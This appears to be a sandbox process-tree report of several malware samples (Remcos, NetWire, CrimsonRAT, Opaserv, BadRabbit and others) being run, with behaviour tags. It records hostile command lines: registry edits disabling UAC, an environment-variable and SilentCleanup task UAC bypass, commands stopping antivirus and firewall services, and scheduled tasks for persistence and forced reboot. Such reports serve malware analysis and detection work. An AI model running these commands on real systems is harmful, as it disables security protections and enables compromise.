C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8661.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc47099893FDD44A129212644AFA40C04E.TMP"4⤵PID:7144
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yxdr3hnu.cmdline"3⤵PID:8088
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4848
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86BE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD7F6E8A22E474D809B8E4060CCECEA95.TMP"4⤵PID:6472
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gmlye8ee.cmdline"3⤵PID:7120
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES872C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFA34D1B1B0E742AB9C7796A8BA56367.TMP"4⤵PID:2836
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\o4mp3hw4.cmdline"3⤵PID:7156
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES878A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDFE381C923D54126A7B0F22FC53F70A1.TMP"4⤵PID:3928
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q3_q0wkj.cmdline"3⤵PID:6768
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8807.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc302CDCFA903040FA92695A75898ADF5E.TMP"4⤵PID:6692
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yppj7a3h.cmdline"3⤵PID:6824
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8874.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEFB1771875334F0CB4C74ED628E3364C.TMP"4⤵PID:7984
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9w4onlmw.cmdline"3⤵PID:6936
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88D2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF8AA212DCF0F47FFBEA84693B524AD89.TMP"4⤵PID:8032
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cvf4xflq.cmdline"3⤵PID:6272
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES892F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFDE3BA6CCBB48D29C31E15D8D71487.TMP"4⤵PID:6776
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\d_ccolat.cmdline"3⤵PID:8080
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES899D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCC20021DBB0F4E19BEE4E862D44D328D.TMP"4⤵PID:7576
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3x49a5dq.cmdline"3⤵PID:6376
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES89FB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDF31171E28E24584B5B1FC867DBD71F.TMP"4⤵PID:7040
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"3⤵PID:7592
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"4⤵PID:7172
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"5⤵PID:7712
-
-
-
-
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Remcos.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Remcos.exe"1⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4624 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- System Location Discovery: System Language Discovery
PID:1816 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "2⤵
- System Location Discovery: System Language Discovery
PID:3192 -
C:\Windows\SysWOW64\PING.EXEPING 127.0.0.1 -n 23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4296
-
-
C:\Windows\SysWOW64\Userdata\Userdata.exe"C:\Windows\SysWOW64\Userdata\Userdata.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1408 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
PID:5188 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2512
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"4⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5320 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- System Location Discovery: System Language Discovery
PID:840 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3244
-
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1936
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CobaltStrike.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5740 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
PID:3576
-
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe"1⤵PID:3080
-
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"2⤵
- Executes dropped EXE
PID:940
-
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"1⤵
- System Location Discovery: System Language Discovery
PID:1408 -
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"2⤵PID:2792
-
C:\Windows\SysWOW64\Notepad.exeC:\Windows\System32\Notepad.exe3⤵PID:7232
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "4⤵PID:5768
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f5⤵
- Modifies registry key
PID:6728
-
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "5⤵
- Modifies registry key
PID:692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I5⤵
- Abuse Elevation Control Mechanism: Bypass User Account Control
PID:7332
-
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f5⤵
- Modifies registry key
PID:7620
-
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵PID:5064
-
-
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe"1⤵PID:6160
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"1⤵
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7952 -
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC2⤵PID:8036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC3⤵PID:4848
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW2⤵PID:8076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW3⤵PID:6444
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC2⤵
- System Location Discovery: System Language Discovery
PID:8060 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC3⤵PID:6200
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD2⤵
- System Location Discovery: System Language Discovery
PID:8100 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD3⤵PID:6344
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS2⤵
- System Location Discovery: System Language Discovery
PID:8112 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS3⤵
- System Location Discovery: System Language Discovery
PID:7036
-
-
-
C:\WINDOWS\system\msload.exeC:\WINDOWS\system\msload.exe2⤵PID:6620
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:6736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:7948
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:6776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:7996
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:6812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:8128
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:6868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:8056
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:6904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:7792
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:7628
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:7800
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:6392
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:3912
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:7368
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5948
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:7532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:2284
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:7476
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:1228
-
-
-
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"1⤵
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:8016 -
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC2⤵
- System Location Discovery: System Language Discovery
PID:5784 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC3⤵
- System Location Discovery: System Language Discovery
PID:6952
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW2⤵
- System Location Discovery: System Language Discovery
PID:3216 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW3⤵PID:6744
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC2⤵
- System Location Discovery: System Language Discovery
PID:5284 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC3⤵
- System Location Discovery: System Language Discovery
PID:6164
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD2⤵
- System Location Discovery: System Language Discovery
PID:5956 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD3⤵
- System Location Discovery: System Language Discovery
PID:6792
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS2⤵
- System Location Discovery: System Language Discovery
PID:4792 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS3⤵PID:7072
-
-
-
C:\WINDOWS\system\msload.exeC:\WINDOWS\system\msload.exe2⤵PID:6668
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:7004
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:7684
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:7052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:8020
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:7068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:7744
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:7104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:8164
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:7140
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:8080
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:6356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4808
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:7116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:2856
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:7244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:7784
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:6928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:7388
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:6948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:2336
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:7400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:7404
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:8064
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:6356
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4640
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:7416
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:6972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:7556
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:228
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:6644
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:6328
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:6532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:6560
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:6692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:6496
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:7128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:7444
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:3520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:6460
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:4112
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:6928
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:3940
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:7812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:6392
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:7404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:7916
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:6356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:7244
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:7084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:3080
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5040
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:4724
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:6636
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:7120
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:4372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:6008
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:6672
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:8060
-
-
-
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"1⤵PID:7232
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 152⤵PID:7440
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Delete /F /TN rhaegal3⤵PID:7752
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /F /TN rhaegal4⤵PID:7976
-
-
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 4095052998 && exit"3⤵PID:5284
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 4095052998 && exit"4⤵
- Scheduled Task/Job: Scheduled Task
PID:7472
-
-
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 16:11:003⤵PID:7612
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 16:11:004⤵
- Scheduled Task/Job: Scheduled Task
PID:7232
-
-
-
C:\Windows\7B26.tmp"C:\Windows\7B26.tmp" \\.\pipe\{0DB19643-8ABE-4764-AC2E-1BA73B5E433C}3⤵PID:6924
-
-
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Birele.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Birele.exe"1⤵PID:7044
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM explorer.exe2⤵
- Kills process with taskkill
PID:7272
-